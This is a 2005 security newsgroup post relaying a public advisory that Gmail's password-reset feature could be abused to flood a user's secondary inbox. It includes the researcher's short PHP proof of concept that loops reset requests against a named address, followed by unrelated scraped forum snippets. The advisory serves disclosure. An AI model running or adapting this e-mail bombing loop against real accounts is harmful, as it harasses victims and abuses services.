Gmail 'forgot your password?' Feature Lets Remote Users Flood a User's Secondary E-mail Account

Gmail 'forgot your password?' Feature Lets Remote Users Flood a
User's Secondary E-mail Account 
http://www.securitytracker.com/alerts/2005/Jan/1012749.html 

***********************************************************
Quote
***********************************************************
SecurityTracker Alert ID:  1012749
SecurityTracker URL:  http://securitytracker.com/id?1012749
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Date:  Jan 2 2005
Impact:  Host/resource access via network
Exploit Included:  Yes  
Description:  Joxean Koret reported a vulnerability in the Gmail
service. A remote user can cause a large amount of e-mail to be
sent to the target user's secondary address. 

The Gmail service 'forgot your password?' feature allows a remote
user to load a certain URL to cause the service to send a
validation e-mail to the specified user's secondary e-mail
address. There is no limit to the number of messages sent over a
period of time, so a remote user can flood the target user's
secondary e-mail address. 

The vendor was notified on September 26, 2004.
Impact:  A remote user can cause a large amount of e-mail to be
sent to the target user's secondary e-mail account. Solution:  No
solution was available at the time of this entry. Vendor URL: 
gmail.google.com/ (Links to External Site) Cause:  Access control
error, State error Reported By:  Joxean Koret
<joxeankoret@yahoo.es> Message History:   None. 

===========================================================
Date:  Sat, 01 Jan 2005 20:15:14 +0000
From:  Joxean Koret <joxeankoret@yahoo.es>
Subject:  GMail E-Mail Bomber

 
 
-----------------------------------------------------------

              GMail E-Mail Bomber
-----------------------------------------------------------

 
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004 
Location: Basque Country
 
-----------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
GMail - Gmail is an experiment in a new kind of webmail, built on
the idea that you should never have to delete mail and you should 
always be able to find the message you want
 
Web : http://gmail.google.com
 
-----------------------------------------------------------
 
Vulnerability:
~~~~~~~~~~~~~~
 
A. E-Mail Bomber
 
The problem is the following : If any gmail user forgots the
password he/she can answer a question or send to her/sher secondary 
e-mail addresses a password reset confirmation e-mail. Well, with 
GMail we can flood the secondary e-mail box of GMail users.
 
I wrote a very basic Proof Of Concept in PHP : 
 
<?php
/******************************************
*
* GMail bomber Proof Of Concept
* Date time : Sun. Sep-26-2004
* Author : Jose Antonio Coret
* E-Mail : 
*       joxeankoret@yahoo.es
*       joxean.piti@gmail.com
*
******************************************/
 
$gmail_account     = "any.gmail.address@gmail.com";
$google_cgi        =
"https://www.google.com/accounts/VerifySecretAnswer";
$google_cgi_params =
"?continue=http://gmail.google.com/gmail&service=mail&Email=
$gmail_account&SendEmail=true&IdentityAnswer=";
$emails_to_send    = 15;
$bomber_url        = "$google_cgi$google_cgi_params";
 
        echo("GMail bomber\n");
        echo("P.O.C. provided by Jose Antonio Coret (Joxean
        Koret)\n 
\n");
        echo("Starting flood against $gmail_account ... \n\n");
 
        for ($i = 0;$i<$emails_to_send;$i++)
        {
                echo("Sending e-mail number " . ($i + 1) . " ...
                "); $fd = fopen($bomber_url, "r");
                fclose($fd);
                echo("Ok.\n");
        }
 
        echo("\n");
        echo("Finish...\n");
?>
 
 
The fix:
~~~~~~~~
 
The vendor was contacted on Sun, 26 Sep 2004 21:11:55 but the
problem still 
continues unfixed at Sun, 26 Dec 2004.
 
Disclaimer:
~~~~~~~~~~~
 
The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.
 
I am not liable for any direct or indirect damages caused as a
result of using the information or demonstrations provided in any
part of this advisory. 
===========================================================

***********************************************************
Unquote
***********************************************************

-- 
Kayode Okeyode
http://del.icio.us/kayodeok
http://www.kayodeok.co.uk/weblog/
0
kayodeok
1/3/2005 2:05:22 PM
grc.security 16608 articles. 3 followers. Follow

0 Replies
720 Views

Similar Articles

[PageSpeed] 48

Reply:

Similar Artilces:

''''''''''''''''''''
Name: haznen Email: haznenatyahoodotcom Product: Gran Paradiso Alpha 8 Summary: '''''''''''''''''''' Comments: '''''''''''''''''''''''''''''''''''' Browser Details: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20061204 UGES/1.7.2.0 GranParadiso/3.0a1 From URL: http://www.mozilla.org/projects/granparadiso/ Note to readers: Hendrix gives...

changes made from one user's webpart's page, effects all user's
 I am just doing this offline right now in Visual Web Developer Express 2008I created the login inonce in the memberpage area, people can modify their webpart page. I created several users to test this out.  I loaded it in a browser.When I make changes as logged in user "A" .  Then logout and login as user "B", user "B,s" webpart page has been changed to user "A".This goes true for whomever I log in as.  It changes for everyone.Is there something specific I need to do in order to get everyone's changes to be unique for them...

login failed because user's IsApproved is false for user's account
Hi How can i detect if a user's login fails because their account is not approved yet (i.e IsApproved = false in Membership table) I am using a templated login control and if the user's login fails for this reason all that happens is that the FailureText control is displayed. How can i change the failure text if the user's account is not approved? thanks andrea Use Membership.GetUser Function this function Return a hydrated MembershipUser Object you can access its properties and check the validity see the link below http://msdn2.microsoft.com/en-us/library/40w5063z.aspxRega...

'''''
Name: mario Email: ramar17atfastwebnetdotit Product: Gran Paradiso Alpha 2 Summary: ''''' Comments: K: Browser Details: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a2) Gecko/20070206 GranParadiso/3.0a2 ...

Unable to cast object of type 'WIM2008_Web.App_Code.wim.security.data.User' to type 'WIM2008_Web.App_Code.wim.security.data.User'
I don't know if i post this in the rigth forum but it is related to database call. this is my code: public DataSet CustomerDetails_Select(Int32 ID)    {      DataSet ds = new DataSet();      WIMConnect wimcon = new WIMConnect();      WIMConnection cnnwim = new WIMConnection();      ConvertDataReaderToDataTable DrToDs = new ConvertDataReaderToDataTable();      GridViewHeadersDao gvh = new GridViewHeadersDao();       &nb...

Word's password feature 'not a security tool'
Word's password feature 'not a security tool' http://news.zdnet.co.uk/0,39020330,39118945,00.htm Microsoft admits that Word's password-protection feature can be easily bypassed, but argues it was never intended to ensure security Microsoft has hit back at critics of Word's password-protect feature, which the company has admitted is not safe from hackers. The tool is intended to make collaboration easier, Microsoft told ZDNet UK, explaining that users should invest in digital signatures or an Adobe Acrobat-type application if they want security. A set ...

Send Message to user's Skype' id ,MSN' Id ,Yahoo'sID or Gmail ID.
hi, i m writing a application in which i have to notify the user to his Skype' id ,MSN' Id ,Yahoo'sID or Gmail ID. Please let me know the code usign C#   Thanks Tulika. hi, what do you want to do...i mean....do you wnat to send email's or do you want to send message to the messenger. thanks, rajiv hi i want to send IM messages to online and offline users not Email. Please help me....

ASA 7.03: User ' another user' has the row in table 'tablename' locked' ????
Error message ASA 7.03: >>>User ' another user' has the row in table 'tablename' locked' <<<< We are using ASA 7.03 on WIN-NT with two processors and 2 GB RAM. Page-Size of database is 4096 ! We have always the above error.messages. But when I call sa_locks(table_name='tablename' ) it shows, there is no table or row locked. We have also called sa_locks(0). But there are no locks. The table has only 300 rows !! It happens AFAIK this means you've run out of locks, where the limit is approximately 10,000,000 f...

One User's Mail Can't Be Printed by Another User
Greetings all-- There is one user here whose email can't be printed. When a second user tries to print, the message "An error occurred during this process" appears. Printing other email and from other applications is fine. Has anyone seen anything like this before? Where does the problem lie, in user A (the sender) or in user B (the recipient)? In user B's case, I removed GW, ran the GW Cleaning Agent, defragged, etc, reinstalled GW and still she can't print user A's email. (I can print user A's mail, but then I'm an Admin.) This is GW 5.5 ...

Firefox 'new tab' feature exposes users' secured info
Not wise to enable this "feature" in a Public Place or even in the presence of curious Family members or Friends. :( http://www.theregister.co.uk/2012/06/22/firefox_new_tab_security_concerns/ Privacy-conscious users have sounded the alarm after it emerged the "New Tab" thumbnail feature in Firefox 13 is "taking snapshots of the user's HTTPS session content". Reg reader Chris discovered the feature after opening a new tab only to be "greeted by my earlier online banking and webmail sessions complete with account numbers, balances, subject lin...

Unable to access user control's user control's function\property from another user control
Hi, I used to call an user control's user control function as stated below from my user control in ASP.Net 1.1 wucCompany.wucEmployee.GetEmployeeSomething() After migrating to ASP.Net 2.0, I am unable to use any properties/functions(even the public ones) of the user control's User control's from another user control.  The way I have to do is create property\function in wucCompany which calls the wucEmployee's property\function and call the wucDepartment.GetEmployeeSomething().Since I need to do this change in too many places, I can...

Screening File Types on 'Upload' to secure user 'Download'
Hi, I'm wondering about the potential for jokers uploading infected files and/or executables on my web server through my asp.net application. In my app the files uploaded by users to the web server's FS get downloaded by others later on (who may wrongly assume the files are virus-free). However, I want max flexibility for the user to upload different file types (e.g. .asp, .php, .swf, .doc, .zip). I'm toying with HtmlInputControl.PostedFile.ContentType and screening here because parsing the filename might not prevent .exe's disguised as other filetypes. Or maybe...

Access denied for user 'root'@'localhost' (using password: NO)
Please help as I am pulling my hair out once again after trying for over 15 months off and on to get a tv tuner working under linux. I have just received my new tuner card which I thought was supposed to be easy to run, a HVR-950Q, no luck yet. But first I am trying to use something called mysql (new to me), for mythtv and [I] keep getting # mysqladmin -u root password ma mysqladmin: connect to server at 'localhost' failed error: 'Access denied for user 'root'@'localhost' (using password: NO)' I screwed something up .... help please -...

Access denied for user 'bugs'@'localhost' (using password: NO)
Hi i am trying to install in windows server 2008 based on the document https://wiki.mozilla.org/Bugzilla:Win32Instal when i trying to install bugzilla with the command D:\Bugzilla>Perl checksetup.pl my error is showing like this...... There was an error connecting to MySQL: Access denied for user 'bugs'@'localhost' (using password: NO) This might have several reasons: * MySQL is not running. * MySQL is running, but there is a problem either in the server configuration or the database access rights. Read the Bugzilla Guide in the doc dire...

Web resources about - Gmail 'forgot your password?' Feature Lets Remote Users Flood a User's Secondary E-mail Account - grc.security

Resources last updated: 12/24/2015 6:39:20 AM